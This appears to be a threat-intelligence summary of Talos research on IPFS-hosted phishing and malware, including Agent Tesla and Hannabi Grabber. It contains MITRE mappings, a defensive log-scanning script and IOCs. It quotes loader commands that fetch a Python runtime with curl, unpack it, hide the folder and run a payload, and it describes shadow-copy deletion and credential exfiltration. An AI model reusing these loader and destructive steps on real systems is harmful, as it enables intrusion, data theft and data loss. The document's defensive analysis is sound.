Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns

IPFS is being exploited by threat actors to host phishing pages and malware payloads, leveraging its censorship-resistant hosting to resist takedowns. Cisco Talos observes multiple campaigns using IPFS to host and retrieve malicious content, complicating defense. #IPFS #AgentTesla #HannabiGrabber #DocuSign #SWIFT

Keypoints

  • IPFS is used to host phishing kits and malware payloads, taking advantage of its resilience and moderation challenges.
  • Cisco Talos tracks ongoing campaigns that leverage IPFS to serve phishing pages and malicious content.
  • IPFS content is served through gateways over standard HTTP/HTTPS, which makes it harder to detect and block at the network level than content hosted on an ordinary malicious domain.
  • Agent Tesla malspam campaigns retrieve final payloads from IPFS during the infection chain.
  • Hannabi Grabber is a Python-based information stealer that uses Discord Webhooks for C2 and exfiltration and targets passwords, cookies, and Discord/Roblox data.
  • The campaigns demonstrate a multi-stage infection chain, including loaders, Python-based payloads, reverse shells, and destructive payloads.
  • Organizations should educate themselves about Web3 technologies like IPFS and implement controls to detect or block IPFS-based threats.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – The campaign uses emails purporting to be from a legitimate service to lure victims to IPFS-hosted pages. ‘The victim received a PDF that purports to be associated with the DocuSign document-signing service.’
  • [T1105] Ingress Tool Transfer – The downloader retrieves a payload from an IPFS gateway. ‘The downloader reaches out to an IPFS gateway to retrieve a blob of data that has been hosted within the IPFS network.’
  • [T1059.003] Windows Command Shell – The loader uses cmd.exe to run commands, including downloading the embeddable Python ZIP with curl. ‘C:\Windows\system32\cmd.exe /c curl https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip -o %appdata%\Microsoft\Network\python-3.10.4-embed-amd64.zip’
  • [T1059.001] PowerShell – The loader expands archives using PowerShell to unpack the downloaded Python package. ‘powershell Expand-Archive python-3.10.4-embed-amd64.zip -DestinationPath %appdata%\Microsoft\Network’
  • [T1547.001] Registry Run Keys/Startup Folder – Persistence by adding registry Run entries. ‘HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon’ and ‘HKLM\Software\Microsoft\Windows\CurrentVersion\Run’
  • [T1564.001] Hide Artifacts – The loader hides artifacts by setting System and Hidden attributes. ‘attrib +S +H %appdata%\Microsoft\Network’
  • [T1059.006] Python – The final payload is executed by the downloaded Python interpreter. ‘…python.exe Packages.txt’
  • [T1059.006] Python (Loader/Payload) – The loader invokes Python to execute the final payload, demonstrating the use of Python-based components in the chain. ‘The loader invokes the newly downloaded Python executable and passes the final payload as a command line argument…’
  • [T1490] Inhibit System Recovery – Destructive payloads attempt to delete system recovery options. ‘Deleting volume shadow copies on the system.’
  • [T1485] Data Destruction – Destructive payloads delete user directories and mounted filesystems. ‘Deleting directory contents stored within C:\Users…’
  • [T1555.003] Credentials from Web Browsers – Hannabi Grabber collects passwords and cookies from Chrome. ‘collects password and cookie data from Chrome.’
  • [T1071.001] Web Protocols – C2 channel uses Discord Webhooks for command and control and exfiltration. ‘uses Discord Webhooks for C2 and data exfiltration.’
  • [T1041] Exfiltration Over C2 Channel – Data is transmitted to attacker-controlled Discord servers. ‘transmits that data to an attacker-controlled Discord server.’
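As an added example (not code from the Talos report), the following Python checks proxy or web-filter log lines for IPFS gateway fetches, the access pattern described in the gateway keypoint and in the T1105 entry above. It recognises both path-style (`/ipfs/<cid>`) and subdomain-style (`<cid>.ipfs.<gateway>`) gateway URLs; the log format, client addresses and the CIDs in the sample are constructed.

```python
import re
from urllib.parse import urlparse

# CIDv0 is "Qm" + 44 base58 chars; CIDv1 in base32 starts with "b" followed by
# lowercase base32 (a-z, 2-7). Length floor on v1 keeps short words from matching.
CID_RE = re.compile(r"^(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{50,})$")
PATH_RE = re.compile(r"^/ipfs/([^/?#]+)")        # path-style gateway URL
SUBDOMAIN_RE = re.compile(r"^([^.]+)\.ipfs\.")   # subdomain-style gateway URL

# Constructed sample proxy log, one request per line: "<ts> <client> <method> <url> <status>"
SAMPLE_LOG = """\
2023-01-10T09:12:01Z 10.0.0.12 GET https://ipfs.io/ipfs/bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi/index.html 200
2023-01-10T09:12:05Z 10.0.0.12 GET https://www.python.org/ftp/python/3.10.4/python-3.10.4-embed-amd64.zip 200
2023-01-10T09:13:44Z 10.0.0.20 GET https://gateway.example/ipfs/QmYwAPJzv5CZsnA625s3Xf2nemtYgPpHdWEz79ojWnPbdG 200
2023-01-10T09:14:02Z 10.0.0.31 GET https://example.com/ipfs/not-a-cid 404
2023-01-10T09:15:10Z 10.0.0.44 GET https://example.com/search?q=ipfs 200
2023-01-10T09:16:30Z 10.0.0.55 GET https://bafybeigdyrzt5sfp7udm7hu76uh7y26nf3efuylqabf3oclgtqy55fbzdi.ipfs.gateway.example/ 200
"""


def extract_ipfs_cid(url: str):
    """Return the CID if url is a path- or subdomain-style IPFS gateway URL, else None."""
    parsed = urlparse(url)
    m = PATH_RE.match(parsed.path)
    if m and CID_RE.match(m.group(1)):
        return m.group(1)
    m = SUBDOMAIN_RE.match(parsed.hostname or "")
    if m and CID_RE.match(m.group(1)):
        return m.group(1)
    return None


def find_ipfs_fetches(log_text: str):
    """Parse log lines and return (timestamp, client, gateway_host, cid) for IPFS gateway fetches."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # skip malformed lines rather than crashing the sweep
        ts, client, _method, url, _status = parts[:5]
        cid = extract_ipfs_cid(url)
        if cid:
            hits.append((ts, client, urlparse(url).hostname, cid))
    return hits


if __name__ == "__main__":
    for ts, client, host, cid in find_ipfs_fetches(SAMPLE_LOG):
        print(f"{ts} {client} fetched CID {cid} via gateway {host}")
```

Because the CID is extracted rather than the gateway domain, the same content fetched through a different gateway still produces a matching indicator.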

Indicators of Compromise

  • [Domain] IPFS gateway domains – ipfs.io, infura-ipfs.io
  • [URL] IPFS resource URL used to host/retrieve content – https://ipfs.io/ipfs/bafybeiaysi4s6lnjev27ln5icwmtueaw2vdykrtjkwiphwekaywqhcjze
  • [File Name] Loader artifacts – Packages.txt, Script.bat
  • [File Name] Payload archives – python-3.10.4-embed-amd64.zip
  • [Malware Family] Agent Tesla – information stealer family
  • [Malware Family] Hannabi Grabber – Python-based information stealer

Read more: https://blog.talosintelligence.com/ipfs-abuse/